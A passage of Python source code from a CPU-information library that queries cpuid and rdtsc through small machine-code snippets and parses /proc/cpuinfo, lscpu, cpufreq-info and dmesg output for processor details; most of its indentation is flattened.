for reg in [ebx, edx, ecx]:
for n in [0, 8, 16, 24]:
vendor_id.append(chr((reg >> n) & 0xFF))
vendor_id = ''.join(vendor_id)
return vendor_id
# http://en.wikipedia.org/wiki/CPUID#EAX.3D1:_Processor_Info_and_Feature_Bits
def get_info(self):
# EAX
eax = self._run_asm(
			b"\xB8\x01\x00\x00\x00", # mov eax,0x1
b"\x0f\xa2" # cpuid
b"\xC3" # ret
)
# Get the CPU info
stepping_id = (eax >> 0) & 0xF # 4 bits
model = (eax >> 4) & 0xF # 4 bits
family_id = (eax >> 8) & 0xF # 4 bits
processor_type = (eax >> 12) & 0x3 # 2 bits
extended_model_id = (eax >> 16) & 0xF # 4 bits
extended_family_id = (eax >> 20) & 0xFF # 8 bits
family = 0
if family_id in [15]:
family = extended_family_id + family_id
else:
family = family_id
if family_id in [6, 15]:
model = (extended_model_id << 4) + model
return {
'stepping' : stepping_id,
'model' : model,
'family' : family,
'processor_type' : processor_type
}
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000000h:_Get_Highest_Extended_Function_Supported
def get_max_extension_support(self):
# Check for extension support
max_extension_support = self._run_asm(
b"\xB8\x00\x00\x00\x80" # mov ax,0x80000000
b"\x0f\xa2" # cpuid
b"\xC3" # ret
)
return max_extension_support
# http://en.wikipedia.org/wiki/CPUID#EAX.3D1:_Processor_Info_and_Feature_Bits
def get_flags(self, max_extension_support):
# EDX
edx = self._run_asm(
			b"\xB8\x01\x00\x00\x00", # mov eax,0x1
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
			b"\xB8\x01\x00\x00\x00", # mov eax,0x1
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the CPU flags
flags = {
'fpu' : _is_bit_set(edx, 0),
'vme' : _is_bit_set(edx, 1),
'de' : _is_bit_set(edx, 2),
'pse' : _is_bit_set(edx, 3),
'tsc' : _is_bit_set(edx, 4),
'msr' : _is_bit_set(edx, 5),
'pae' : _is_bit_set(edx, 6),
'mce' : _is_bit_set(edx, 7),
'cx8' : _is_bit_set(edx, 8),
'apic' : _is_bit_set(edx, 9),
#'reserved1' : _is_bit_set(edx, 10),
'sep' : _is_bit_set(edx, 11),
'mtrr' : _is_bit_set(edx, 12),
'pge' : _is_bit_set(edx, 13),
'mca' : _is_bit_set(edx, 14),
'cmov' : _is_bit_set(edx, 15),
'pat' : _is_bit_set(edx, 16),
'pse36' : _is_bit_set(edx, 17),
'pn' : _is_bit_set(edx, 18),
'clflush' : _is_bit_set(edx, 19),
#'reserved2' : _is_bit_set(edx, 20),
'dts' : _is_bit_set(edx, 21),
'acpi' : _is_bit_set(edx, 22),
'mmx' : _is_bit_set(edx, 23),
'fxsr' : _is_bit_set(edx, 24),
'sse' : _is_bit_set(edx, 25),
'sse2' : _is_bit_set(edx, 26),
'ss' : _is_bit_set(edx, 27),
'ht' : _is_bit_set(edx, 28),
'tm' : _is_bit_set(edx, 29),
'ia64' : _is_bit_set(edx, 30),
'pbe' : _is_bit_set(edx, 31),
'pni' : _is_bit_set(ecx, 0),
'pclmulqdq' : _is_bit_set(ecx, 1),
'dtes64' : _is_bit_set(ecx, 2),
'monitor' : _is_bit_set(ecx, 3),
'ds_cpl' : _is_bit_set(ecx, 4),
'vmx' : _is_bit_set(ecx, 5),
'smx' : _is_bit_set(ecx, 6),
'est' : _is_bit_set(ecx, 7),
'tm2' : _is_bit_set(ecx, 8),
'ssse3' : _is_bit_set(ecx, 9),
'cid' : _is_bit_set(ecx, 10),
#'reserved3' : _is_bit_set(ecx, 11),
'fma' : _is_bit_set(ecx, 12),
'cx16' : _is_bit_set(ecx, 13),
'xtpr' : _is_bit_set(ecx, 14),
'pdcm' : _is_bit_set(ecx, 15),
#'reserved4' : _is_bit_set(ecx, 16),
'pcid' : _is_bit_set(ecx, 17),
'dca' : _is_bit_set(ecx, 18),
'sse4_1' : _is_bit_set(ecx, 19),
'sse4_2' : _is_bit_set(ecx, 20),
'x2apic' : _is_bit_set(ecx, 21),
'movbe' : _is_bit_set(ecx, 22),
'popcnt' : _is_bit_set(ecx, 23),
'tscdeadline' : _is_bit_set(ecx, 24),
'aes' : _is_bit_set(ecx, 25),
'xsave' : _is_bit_set(ecx, 26),
'osxsave' : _is_bit_set(ecx, 27),
'avx' : _is_bit_set(ecx, 28),
'f16c' : _is_bit_set(ecx, 29),
'rdrnd' : _is_bit_set(ecx, 30),
'hypervisor' : _is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
# http://en.wikipedia.org/wiki/CPUID#EAX.3D7.2C_ECX.3D0:_Extended_Features
if max_extension_support >= 7:
# EBX
ebx = self._run_asm(
b"\x31\xC9", # xor ecx,ecx
b"\xB8\x07\x00\x00\x00" # mov eax,7
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\x31\xC9", # xor ecx,ecx
b"\xB8\x07\x00\x00\x00" # mov eax,7
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the extended CPU flags
extended_flags = {
#'fsgsbase' : _is_bit_set(ebx, 0),
#'IA32_TSC_ADJUST' : _is_bit_set(ebx, 1),
'sgx' : _is_bit_set(ebx, 2),
'bmi1' : _is_bit_set(ebx, 3),
'hle' : _is_bit_set(ebx, 4),
'avx2' : _is_bit_set(ebx, 5),
#'reserved' : _is_bit_set(ebx, 6),
'smep' : _is_bit_set(ebx, 7),
'bmi2' : _is_bit_set(ebx, 8),
'erms' : _is_bit_set(ebx, 9),
'invpcid' : _is_bit_set(ebx, 10),
'rtm' : _is_bit_set(ebx, 11),
'pqm' : _is_bit_set(ebx, 12),
#'FPU CS and FPU DS deprecated' : _is_bit_set(ebx, 13),
'mpx' : _is_bit_set(ebx, 14),
'pqe' : _is_bit_set(ebx, 15),
'avx512f' : _is_bit_set(ebx, 16),
'avx512dq' : _is_bit_set(ebx, 17),
'rdseed' : _is_bit_set(ebx, 18),
'adx' : _is_bit_set(ebx, 19),
'smap' : _is_bit_set(ebx, 20),
'avx512ifma' : _is_bit_set(ebx, 21),
'pcommit' : _is_bit_set(ebx, 22),
'clflushopt' : _is_bit_set(ebx, 23),
'clwb' : _is_bit_set(ebx, 24),
'intel_pt' : _is_bit_set(ebx, 25),
'avx512pf' : _is_bit_set(ebx, 26),
'avx512er' : _is_bit_set(ebx, 27),
'avx512cd' : _is_bit_set(ebx, 28),
'sha' : _is_bit_set(ebx, 29),
'avx512bw' : _is_bit_set(ebx, 30),
'avx512vl' : _is_bit_set(ebx, 31),
'prefetchwt1' : _is_bit_set(ecx, 0),
'avx512vbmi' : _is_bit_set(ecx, 1),
'umip' : _is_bit_set(ecx, 2),
'pku' : _is_bit_set(ecx, 3),
'ospke' : _is_bit_set(ecx, 4),
#'reserved' : _is_bit_set(ecx, 5),
'avx512vbmi2' : _is_bit_set(ecx, 6),
#'reserved' : _is_bit_set(ecx, 7),
'gfni' : _is_bit_set(ecx, 8),
'vaes' : _is_bit_set(ecx, 9),
'vpclmulqdq' : _is_bit_set(ecx, 10),
'avx512vnni' : _is_bit_set(ecx, 11),
'avx512bitalg' : _is_bit_set(ecx, 12),
#'reserved' : _is_bit_set(ecx, 13),
'avx512vpopcntdq' : _is_bit_set(ecx, 14),
#'reserved' : _is_bit_set(ecx, 15),
#'reserved' : _is_bit_set(ecx, 16),
#'mpx0' : _is_bit_set(ecx, 17),
#'mpx1' : _is_bit_set(ecx, 18),
#'mpx2' : _is_bit_set(ecx, 19),
#'mpx3' : _is_bit_set(ecx, 20),
#'mpx4' : _is_bit_set(ecx, 21),
'rdpid' : _is_bit_set(ecx, 22),
#'reserved' : _is_bit_set(ecx, 23),
#'reserved' : _is_bit_set(ecx, 24),
#'reserved' : _is_bit_set(ecx, 25),
#'reserved' : _is_bit_set(ecx, 26),
#'reserved' : _is_bit_set(ecx, 27),
#'reserved' : _is_bit_set(ecx, 28),
#'reserved' : _is_bit_set(ecx, 29),
'sgx_lc' : _is_bit_set(ecx, 30),
#'reserved' : _is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
extended_flags = [k for k, v in extended_flags.items() if v]
flags += extended_flags
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000001h:_Extended_Processor_Info_and_Feature_Bits
if max_extension_support >= 0x80000001:
# EBX
ebx = self._run_asm(
b"\xB8\x01\x00\x00\x80" # mov ax,0x80000001
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\xB8\x01\x00\x00\x80" # mov ax,0x80000001
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the extended CPU flags
extended_flags = {
'fpu' : _is_bit_set(ebx, 0),
'vme' : _is_bit_set(ebx, 1),
'de' : _is_bit_set(ebx, 2),
'pse' : _is_bit_set(ebx, 3),
'tsc' : _is_bit_set(ebx, 4),
'msr' : _is_bit_set(ebx, 5),
'pae' : _is_bit_set(ebx, 6),
'mce' : _is_bit_set(ebx, 7),
'cx8' : _is_bit_set(ebx, 8),
'apic' : _is_bit_set(ebx, 9),
#'reserved' : _is_bit_set(ebx, 10),
'syscall' : _is_bit_set(ebx, 11),
'mtrr' : _is_bit_set(ebx, 12),
'pge' : _is_bit_set(ebx, 13),
'mca' : _is_bit_set(ebx, 14),
'cmov' : _is_bit_set(ebx, 15),
'pat' : _is_bit_set(ebx, 16),
'pse36' : _is_bit_set(ebx, 17),
#'reserved' : _is_bit_set(ebx, 18),
'mp' : _is_bit_set(ebx, 19),
'nx' : _is_bit_set(ebx, 20),
#'reserved' : _is_bit_set(ebx, 21),
'mmxext' : _is_bit_set(ebx, 22),
'mmx' : _is_bit_set(ebx, 23),
'fxsr' : _is_bit_set(ebx, 24),
'fxsr_opt' : _is_bit_set(ebx, 25),
				'pdpe1gb' : _is_bit_set(ebx, 26),
'rdtscp' : _is_bit_set(ebx, 27),
#'reserved' : _is_bit_set(ebx, 28),
'lm' : _is_bit_set(ebx, 29),
'3dnowext' : _is_bit_set(ebx, 30),
'3dnow' : _is_bit_set(ebx, 31),
'lahf_lm' : _is_bit_set(ecx, 0),
'cmp_legacy' : _is_bit_set(ecx, 1),
'svm' : _is_bit_set(ecx, 2),
'extapic' : _is_bit_set(ecx, 3),
'cr8_legacy' : _is_bit_set(ecx, 4),
'abm' : _is_bit_set(ecx, 5),
'sse4a' : _is_bit_set(ecx, 6),
'misalignsse' : _is_bit_set(ecx, 7),
'3dnowprefetch' : _is_bit_set(ecx, 8),
'osvw' : _is_bit_set(ecx, 9),
'ibs' : _is_bit_set(ecx, 10),
'xop' : _is_bit_set(ecx, 11),
'skinit' : _is_bit_set(ecx, 12),
'wdt' : _is_bit_set(ecx, 13),
#'reserved' : _is_bit_set(ecx, 14),
'lwp' : _is_bit_set(ecx, 15),
'fma4' : _is_bit_set(ecx, 16),
'tce' : _is_bit_set(ecx, 17),
#'reserved' : _is_bit_set(ecx, 18),
'nodeid_msr' : _is_bit_set(ecx, 19),
#'reserved' : _is_bit_set(ecx, 20),
'tbm' : _is_bit_set(ecx, 21),
'topoext' : _is_bit_set(ecx, 22),
'perfctr_core' : _is_bit_set(ecx, 23),
'perfctr_nb' : _is_bit_set(ecx, 24),
#'reserved' : _is_bit_set(ecx, 25),
'dbx' : _is_bit_set(ecx, 26),
'perftsc' : _is_bit_set(ecx, 27),
'pci_l2i' : _is_bit_set(ecx, 28),
#'reserved' : _is_bit_set(ecx, 29),
#'reserved' : _is_bit_set(ecx, 30),
#'reserved' : _is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
extended_flags = [k for k, v in extended_flags.items() if v]
flags += extended_flags
flags.sort()
return flags
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000002h.2C80000003h.2C80000004h:_Processor_Brand_String
def get_processor_brand(self, max_extension_support):
processor_brand = ""
# Processor brand string
if max_extension_support >= 0x80000004:
instructions = [
b"\xB8\x02\x00\x00\x80", # mov ax,0x80000002
b"\xB8\x03\x00\x00\x80", # mov ax,0x80000003
b"\xB8\x04\x00\x00\x80" # mov ax,0x80000004
]
for instruction in instructions:
# EAX
eax = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xC0" # mov ax,ax
b"\xC3" # ret
)
# EBX
ebx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# EDX
edx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# Combine each of the 4 bytes in each register into the string
for reg in [eax, ebx, ecx, edx]:
for n in [0, 8, 16, 24]:
processor_brand += chr((reg >> n) & 0xFF)
# Strip off any trailing NULL terminators and white space
processor_brand = processor_brand.strip("\0").strip()
return processor_brand
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000006h:_Extended_L2_Cache_Features
def get_cache(self, max_extension_support):
cache_info = {}
# Just return if the cache feature is not supported
if max_extension_support < 0x80000006:
return cache_info
# ECX
ecx = self._run_asm(
b"\xB8\x06\x00\x00\x80" # mov ax,0x80000006
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
cache_info = {
'size_b' : (ecx & 0xFF) * 1024,
'associativity' : (ecx >> 12) & 0xF,
'line_size_b' : (ecx >> 16) & 0xFFFF
}
return cache_info
def get_ticks_func(self):
retval = None
if DataSource.bits == '32bit':
# Works on x86_32
restype = None
argtypes = (ctypes.POINTER(ctypes.c_uint), ctypes.POINTER(ctypes.c_uint))
get_ticks_x86_32 = self._asm_func(restype, argtypes,
[
b"\x55", # push bp
b"\x89\xE5", # mov bp,sp
b"\x31\xC0", # xor ax,ax
b"\x0F\xA2", # cpuid
b"\x0F\x31", # rdtsc
b"\x8B\x5D\x08", # mov bx,[di+0x8]
b"\x8B\x4D\x0C", # mov cx,[di+0xc]
b"\x89\x13", # mov [bp+di],dx
b"\x89\x01", # mov [bx+di],ax
b"\x5D", # pop bp
b"\xC3" # ret
]
)
# Monkey patch func to combine high and low args into one return
old_func = get_ticks_x86_32.func
def new_func():
# Pass two uint32s into function
high = ctypes.c_uint32(0)
low = ctypes.c_uint32(0)
old_func(ctypes.byref(high), ctypes.byref(low))
# Shift the two uint32s into one uint64
retval = ((high.value << 32) & 0xFFFFFFFF00000000) | low.value
return retval
get_ticks_x86_32.func = new_func
retval = get_ticks_x86_32
elif DataSource.bits == '64bit':
# Works on x86_64
restype = ctypes.c_uint64
argtypes = ()
get_ticks_x86_64 = self._asm_func(restype, argtypes,
[
b"\x48", # dec ax
b"\x31\xC0", # xor ax,ax
b"\x0F\xA2", # cpuid
b"\x0F\x31", # rdtsc
b"\x48", # dec ax
b"\xC1\xE2\x20", # shl dx,byte 0x20
b"\x48", # dec ax
b"\x09\xD0", # or ax,dx
b"\xC3", # ret
]
)
retval = get_ticks_x86_64
return retval
def get_raw_hz(self):
from time import sleep
ticks_fn = self.get_ticks_func()
start = ticks_fn.func()
sleep(1)
end = ticks_fn.func()
ticks = (end - start)
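		# With a one second sleep, the elapsed TSC ticks roughly approximate the
		# CPU frequency in Hz, which is how the caller interprets this value.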
ticks_fn.free()
return ticks
def _get_cpu_info_from_cpuid_actual():
'''
Warning! This function has the potential to crash the Python runtime.
Do not call it directly. Use the _get_cpu_info_from_cpuid function instead.
It will safely call this function in another process.
'''
if IS_PY2:
from cStringIO import StringIO
else:
from io import StringIO
trace = Trace(True, True)
info = {}
# Pipe stdout and stderr to strings
sys.stdout = trace._stdout
sys.stderr = trace._stderr
try:
# Get the CPU arch and bits
arch, bits = _parse_arch(DataSource.arch_string_raw)
# Return none if this is not an X86 CPU
if not arch in ['X86_32', 'X86_64']:
trace.fail('Not running on X86_32 or X86_64. Skipping ...')
return trace.to_dict(info, True)
# Return none if SE Linux is in enforcing mode
cpuid = CPUID(trace)
if cpuid.is_selinux_enforcing:
trace.fail('SELinux is enforcing. Skipping ...')
return trace.to_dict(info, True)
# Get the cpu info from the CPUID register
max_extension_support = cpuid.get_max_extension_support()
cache_info = cpuid.get_cache(max_extension_support)
info = cpuid.get_info()
processor_brand = cpuid.get_processor_brand(max_extension_support)
# Get the Hz and scale
hz_actual = cpuid.get_raw_hz()
hz_actual = _to_decimal_string(hz_actual)
# Get the Hz and scale
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
info = {
'vendor_id_raw' : cpuid.get_vendor_id(),
'hardware_raw' : '',
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, 0),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, 0),
'l2_cache_size' : cache_info['size_b'],
'l2_cache_line_size' : cache_info['line_size_b'],
'l2_cache_associativity' : cache_info['associativity'],
'stepping' : info['stepping'],
'model' : info['model'],
'family' : info['family'],
'processor_type' : info['processor_type'],
'flags' : cpuid.get_flags(max_extension_support)
}
info = _filter_dict_keys_with_empty_values(info)
trace.success()
except Exception as err:
from traceback import format_exc
err_string = format_exc()
trace._err = ''.join(['\t\t{0}\n'.format(n) for n in err_string.split('\n')]) + '\n'
return trace.to_dict(info, True)
return trace.to_dict(info, False)
def _get_cpu_info_from_cpuid_subprocess_wrapper(queue):
orig_stdout = sys.stdout
orig_stderr = sys.stderr
output = _get_cpu_info_from_cpuid_actual()
sys.stdout = orig_stdout
sys.stderr = orig_stderr
queue.put(_obj_to_b64(output))
def _get_cpu_info_from_cpuid():
'''
Returns the CPU info gathered by querying the X86 cpuid register in a new process.
Returns {} on non X86 cpus.
Returns {} if SELinux is in enforcing mode.
'''
	g_trace.header('Trying to get info from CPUID ...')
from multiprocessing import Process, Queue
# Return {} if can't cpuid
if not DataSource.can_cpuid:
g_trace.fail('Can\'t CPUID. Skipping ...')
return {}
# Get the CPU arch and bits
arch, bits = _parse_arch(DataSource.arch_string_raw)
# Return {} if this is not an X86 CPU
if not arch in ['X86_32', 'X86_64']:
g_trace.fail('Not running on X86_32 or X86_64. Skipping ...')
return {}
try:
if CAN_CALL_CPUID_IN_SUBPROCESS:
# Start running the function in a subprocess
queue = Queue()
p = Process(target=_get_cpu_info_from_cpuid_subprocess_wrapper, args=(queue,))
p.start()
# Wait for the process to end, while it is still alive
while p.is_alive():
p.join(0)
# Return {} if it failed
if p.exitcode != 0:
g_trace.fail('Failed to run CPUID in process. Skipping ...')
return {}
# Return {} if no results
if queue.empty():
g_trace.fail('Failed to get anything from CPUID process. Skipping ...')
return {}
# Return the result, only if there is something to read
else:
output = _b64_to_obj(queue.get())
import pprint
pp = pprint.PrettyPrinter(indent=4)
#pp.pprint(output)
if 'output' in output and output['output']:
g_trace.write(output['output'])
if 'stdout' in output and output['stdout']:
sys.stdout.write('{0}\n'.format(output['stdout']))
sys.stdout.flush()
if 'stderr' in output and output['stderr']:
sys.stderr.write('{0}\n'.format(output['stderr']))
sys.stderr.flush()
if 'is_fail' not in output:
g_trace.fail('Failed to get is_fail from CPUID process. Skipping ...')
return {}
# Fail if there was an exception
if 'err' in output and output['err']:
g_trace.fail('Failed to run CPUID in process. Skipping ...')
g_trace.write(output['err'])
g_trace.write('Failed ...')
return {}
if 'is_fail' in output and output['is_fail']:
g_trace.write('Failed ...')
return {}
if 'info' not in output or not output['info']:
g_trace.fail('Failed to get return info from CPUID process. Skipping ...')
return {}
return output['info']
else:
# FIXME: This should write the values like in the above call to actual
orig_stdout = sys.stdout
orig_stderr = sys.stderr
output = _get_cpu_info_from_cpuid_actual()
sys.stdout = orig_stdout
sys.stderr = orig_stderr
g_trace.success()
return output['info']
except Exception as err:
g_trace.fail(err)
pass
# Return {} if everything failed
return {}
def _get_cpu_info_from_proc_cpuinfo():
'''
Returns the CPU info gathered from /proc/cpuinfo.
Returns {} if /proc/cpuinfo is not found.
'''
	g_trace.header('Trying to get info from /proc/cpuinfo ...')
try:
# Just return {} if there is no cpuinfo
if not DataSource.has_proc_cpuinfo():
g_trace.fail('Failed to find /proc/cpuinfo. Skipping ...')
return {}
returncode, output = DataSource.cat_proc_cpuinfo()
if returncode != 0:
g_trace.fail('Failed to run cat /proc/cpuinfo. Skipping ...')
return {}
# Various fields
vendor_id = _get_field(False, output, None, '', 'vendor_id', 'vendor id', 'vendor')
processor_brand = _get_field(True, output, None, None, 'model name','cpu', 'processor')
cache_size = _get_field(False, output, None, '', 'cache size')
stepping = _get_field(False, output, int, 0, 'stepping')
model = _get_field(False, output, int, 0, 'model')
family = _get_field(False, output, int, 0, 'cpu family')
hardware = _get_field(False, output, None, '', 'Hardware')
# Flags
flags = _get_field(False, output, None, None, 'flags', 'Features')
if flags:
flags = flags.split()
flags.sort()
# Check for other cache format
if not cache_size:
try:
for i in range(0, 10):
name = "cache{0}".format(i)
value = _get_field(False, output, None, None, name)
if value:
value = [entry.split('=') for entry in value.split(' ')]
value = dict(value)
if 'level' in value and value['level'] == '3' and 'size' in value:
cache_size = value['size']
break
except Exception:
pass
# Convert from MHz string to Hz
hz_actual = _get_field(False, output, None, '', 'cpu MHz', 'cpu speed', 'clock', 'cpu MHz dynamic', 'cpu MHz static')
hz_actual = hz_actual.lower().rstrip('mhz').strip()
hz_actual = _to_decimal_string(hz_actual)
# Convert from GHz/MHz string to Hz
hz_advertised, scale = (None, 0)
try:
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
except Exception:
pass
info = {
'hardware_raw' : hardware,
'brand_raw' : processor_brand,
'l3_cache_size' : _friendly_bytes_to_int(cache_size),
'flags' : flags,
'vendor_id_raw' : vendor_id,
'stepping' : stepping,
'model' : model,
'family' : family,
}
# Make the Hz the same for actual and advertised if missing any
if not hz_advertised or hz_advertised == '0.0':
hz_advertised = hz_actual
scale = 6
elif not hz_actual or hz_actual == '0.0':
hz_actual = hz_advertised
# Add the Hz if there is one
if _hz_short_to_full(hz_advertised, scale) > (0, 0):
info['hz_advertised_friendly'] = _hz_short_to_friendly(hz_advertised, scale)
info['hz_advertised'] = _hz_short_to_full(hz_advertised, scale)
if _hz_short_to_full(hz_actual, scale) > (0, 0):
info['hz_actual_friendly'] = _hz_short_to_friendly(hz_actual, 6)
info['hz_actual'] = _hz_short_to_full(hz_actual, 6)
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_cpufreq_info():
'''
Returns the CPU info gathered from cpufreq-info.
Returns {} if cpufreq-info is not found.
'''
	g_trace.header('Trying to get info from cpufreq-info ...')
try:
hz_brand, scale = '0.0', 0
if not DataSource.has_cpufreq_info():
g_trace.fail('Failed to find cpufreq-info. Skipping ...')
return {}
returncode, output = DataSource.cpufreq_info()
if returncode != 0:
g_trace.fail('Failed to run cpufreq-info. Skipping ...')
return {}
hz_brand = output.split('current CPU frequency is')[1].split('\n')[0]
i = hz_brand.find('Hz')
assert(i != -1)
hz_brand = hz_brand[0 : i+2].strip().lower()
if hz_brand.endswith('mhz'):
scale = 6
elif hz_brand.endswith('ghz'):
scale = 9
hz_brand = hz_brand.rstrip('mhz').rstrip('ghz').strip()
hz_brand = _to_decimal_string(hz_brand)
info = {
'hz_advertised_friendly' : _hz_short_to_friendly(hz_brand, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_brand, scale),
'hz_advertised' : _hz_short_to_full(hz_brand, scale),
'hz_actual' : _hz_short_to_full(hz_brand, scale),
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_lscpu():
'''
Returns the CPU info gathered from lscpu.
Returns {} if lscpu is not found.
'''
	g_trace.header('Trying to get info from lscpu ...')
try:
if not DataSource.has_lscpu():
g_trace.fail('Failed to find lscpu. Skipping ...')
return {}
returncode, output = DataSource.lscpu()
if returncode != 0:
g_trace.fail('Failed to run lscpu. Skipping ...')
return {}
info = {}
new_hz = _get_field(False, output, None, None, 'CPU max MHz', 'CPU MHz')
if new_hz:
new_hz = _to_decimal_string(new_hz)
scale = 6
info['hz_advertised_friendly'] = _hz_short_to_friendly(new_hz, scale)
info['hz_actual_friendly'] = _hz_short_to_friendly(new_hz, scale)
info['hz_advertised'] = _hz_short_to_full(new_hz, scale)
info['hz_actual'] = _hz_short_to_full(new_hz, scale)
new_hz = _get_field(False, output, None, None, 'CPU dynamic MHz', 'CPU static MHz')
if new_hz:
new_hz = _to_decimal_string(new_hz)
scale = 6
info['hz_advertised_friendly'] = _hz_short_to_friendly(new_hz, scale)
info['hz_actual_friendly'] = _hz_short_to_friendly(new_hz, scale)
info['hz_advertised'] = _hz_short_to_full(new_hz, scale)
info['hz_actual'] = _hz_short_to_full(new_hz, scale)
vendor_id = _get_field(False, output, None, None, 'Vendor ID')
if vendor_id:
info['vendor_id_raw'] = vendor_id
brand = _get_field(False, output, None, None, 'Model name')
if brand:
info['brand_raw'] = brand
family = _get_field(False, output, None, None, 'CPU family')
if family and family.isdigit():
info['family'] = int(family)
stepping = _get_field(False, output, None, None, 'Stepping')
if stepping and stepping.isdigit():
info['stepping'] = int(stepping)
model = _get_field(False, output, None, None, 'Model')
if model and model.isdigit():
info['model'] = int(model)
l1_data_cache_size = _get_field(False, output, None, None, 'L1d cache')
if l1_data_cache_size:
info['l1_data_cache_size'] = _friendly_bytes_to_int(l1_data_cache_size)
l1_instruction_cache_size = _get_field(False, output, None, None, 'L1i cache')
if l1_instruction_cache_size:
info['l1_instruction_cache_size'] = _friendly_bytes_to_int(l1_instruction_cache_size)
l2_cache_size = _get_field(False, output, None, None, 'L2 cache', 'L2d cache')
if l2_cache_size:
info['l2_cache_size'] = _friendly_bytes_to_int(l2_cache_size)
l3_cache_size = _get_field(False, output, None, None, 'L3 cache')
if l3_cache_size:
info['l3_cache_size'] = _friendly_bytes_to_int(l3_cache_size)
# Flags
flags = _get_field(False, output, None, None, 'flags', 'Features')
if flags:
flags = flags.split()
flags.sort()
info['flags'] = flags
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_dmesg():
'''
Returns the CPU info gathered from dmesg.
Returns {} if dmesg is not found or does not have the desired info.
'''
	g_trace.header('Trying to get info from dmesg ...')
# Just return {} if this arch has an unreliable dmesg log
arch, bits = _parse_arch(DataSource.arch_string_raw)
if arch in ['S390X']:
g_trace.fail('Running on S390X. Skipping ...')
return {}
# Just return {} if there is no dmesg
if not DataSource.has_dmesg():
g_trace.fail('Failed to find dmesg. Skipping ...')
return {}
# If dmesg fails return {}
returncode, output = DataSource.dmesg_a()
if output == None or returncode != 0:
g_trace.fail('Failed to run \"dmesg -a\". Skipping ...')
return {}
info = _parse_dmesg_output(output)
g_trace.success()
return info
# https://openpowerfoundation.org/wp-content/uploads/2016/05/LoPAPR_DRAFT_v11_24March2016_cmt1.pdf
# page 767
def _get_cpu_info_from_ibm_pa_features():
'''
Returns the CPU info gathered from lsprop /proc/device-tree/cpus/*/ibm,pa-features
Returns {} if lsprop is not found or ibm,pa-features does not have the desired info.
'''
	g_trace.header('Trying to get info from lsprop ...')
try:
# Just return {} if there is no lsprop
if not DataSource.has_ibm_pa_features():
g_trace.fail('Failed to find lsprop. Skipping ...')
return {}
# If ibm,pa-features fails return {}
returncode, output = DataSource.ibm_pa_features()
if output == None or returncode != 0:
g_trace.fail('Failed to glob /proc/device-tree/cpus/*/ibm,pa-features. Skipping ...')
return {}
# Filter out invalid characters from output
value = output.split("ibm,pa-features")[1].lower()
value = [s for s in value if s in list('0123456789abcfed')]
value = ''.join(value)
# Get data converted to Uint32 chunks
left = int(value[0 : 8], 16)
right = int(value[8 : 16], 16)
# Get the CPU flags
flags = {
# Byte 0
'mmu' : _is_bit_set(left, 0),
'fpu' : _is_bit_set(left, 1),
'slb' : _is_bit_set(left, 2),
'run' : _is_bit_set(left, 3),
#'reserved' : _is_bit_set(left, 4),
'dabr' : _is_bit_set(left, 5),
'ne' : _is_bit_set(left, 6),
'wtr' : _is_bit_set(left, 7),
# Byte 1
'mcr' : _is_bit_set(left, 8),
'dsisr' : _is_bit_set(left, 9),
'lp' : _is_bit_set(left, 10),
'ri' : _is_bit_set(left, 11),
'dabrx' : _is_bit_set(left, 12),
'sprg3' : _is_bit_set(left, 13),
'rislb' : _is_bit_set(left, 14),
'pp' : _is_bit_set(left, 15),
# Byte 2
'vpm' : _is_bit_set(left, 16),
'dss_2.05' : _is_bit_set(left, 17),
#'reserved' : _is_bit_set(left, 18),
'dar' : _is_bit_set(left, 19),
#'reserved' : _is_bit_set(left, 20),
'ppr' : _is_bit_set(left, 21),
'dss_2.02' : _is_bit_set(left, 22),
'dss_2.06' : _is_bit_set(left, 23),
# Byte 3
'lsd_in_dscr' : _is_bit_set(left, 24),
'ugr_in_dscr' : _is_bit_set(left, 25),
#'reserved' : _is_bit_set(left, 26),
#'reserved' : _is_bit_set(left, 27),
#'reserved' : _is_bit_set(left, 28),
#'reserved' : _is_bit_set(left, 29),
#'reserved' : _is_bit_set(left, 30),
#'reserved' : _is_bit_set(left, 31),
# Byte 4
